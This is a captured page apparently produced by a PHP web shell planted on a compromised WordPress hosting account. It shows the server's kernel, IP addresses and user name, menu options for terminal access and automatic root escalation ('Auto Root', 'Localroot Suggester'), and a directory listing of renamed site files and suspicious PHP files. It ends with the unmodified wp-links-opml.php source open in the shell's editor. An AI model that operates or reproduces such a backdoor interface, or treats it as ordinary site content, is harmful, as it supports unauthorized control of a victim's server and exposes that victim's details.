Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
whiteteakllc.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb__d97c8de
[ DIR ]
drwxrwxrwx
2026-04-20 06:37
.well-known__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
68c37776
[ DIR ]
drwxr-xr-x
2026-04-20 13:24
cgi-bin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
fb1be__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
test__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
wp-admin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-content__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-includes__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
.hcflag__d97c8de
31
B
-rw-r--r--
2026-04-14 16:31
.htaccess
498
B
-rw-r--r--
2026-04-24 05:56
.htaccess.bk__d97c8de
1.96
KB
-rw-r--r--
2024-03-05 08:05
.litespeed_flag__d97c8de
297
B
-rw-r--r--
2026-04-20 01:36
error_log
352
B
-rw-r--r--
2026-04-20 06:30
error_log__d97c8de
22.91
KB
-rw-r--r--
2026-04-20 04:08
google2b4ed44d8f7447b4.html
53
B
-rw-r--r--
2026-04-27 08:04
google3a2fa76329422a80.html__d97c8de
53
B
-rw-r--r--
2026-03-27 06:21
index.php
95.65
KB
-rw-r--r--
2026-04-20 07:54
license.txt__d97c8de
19.44
KB
-rw-r--r--
2025-12-03 01:11
readme.html__d97c8de
7.25
KB
-rw-r--r--
2026-03-16 09:43
style.php__d97c8de
26
B
-rw-r--r--
2026-03-29 01:13
txets.php
5.91
KB
-r--r--r--
2026-04-24 05:56
wZhOSd6abp2KhPym0JL47qeEVHc4oBDB.php__d97c8de
243
B
-rw-r--r--
2026-03-24 21:04
wp-activate.php__d97c8de
7.18
KB
-rw-r--r--
2025-12-03 01:11
wp-blog-header.php__d97c8de
361
B
-rw-r--r--
2026-04-18 22:45
wp-comments-post.php__d97c8de
2.27
KB
-rw-r--r--
2024-03-04 07:30
wp-config-sample.php__d97c8de
6
KB
-rw-r--r--
2026-04-17 01:36
wp-config.php__d97c8de
3.31
KB
-rw-r--r--
2026-04-18 22:47
wp-links-opml.php__d97c8de
2.43
KB
-rw-r--r--
2025-12-03 01:11
wp-load.php__d97c8de
3.88
KB
-rw-r--r--
2026-04-18 22:50
wp-login.php__d97c8de
50.23
KB
-rw-r--r--
2025-12-03 01:11
wp-mail.php__d97c8de
8.52
KB
-rw-r--r--
2025-12-03 01:11
wp-settings.php__d97c8de
30.33
KB
-rw-r--r--
2026-04-18 22:44
wp-signup.php__d97c8de
33.71
KB
-rw-r--r--
2025-04-15 21:13
wp-trackback.php__d97c8de
5.09
KB
-rw-r--r--
2025-12-03 01:11
wp-xmlwhi.php__d97c8de
420
B
-rw-r--r--
2024-03-04 07:58
x.zip__d97c8de
5.59
KB
-rw-r--r--
2026-03-29 01:13
xmlrpc.php__d97c8de
3.13
KB
-rw-r--r--
2025-04-15 21:13
z000.gz__d97c8de
57.59
KB
-rw-r--r--
2026-03-29 01:08
Save
Rename
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>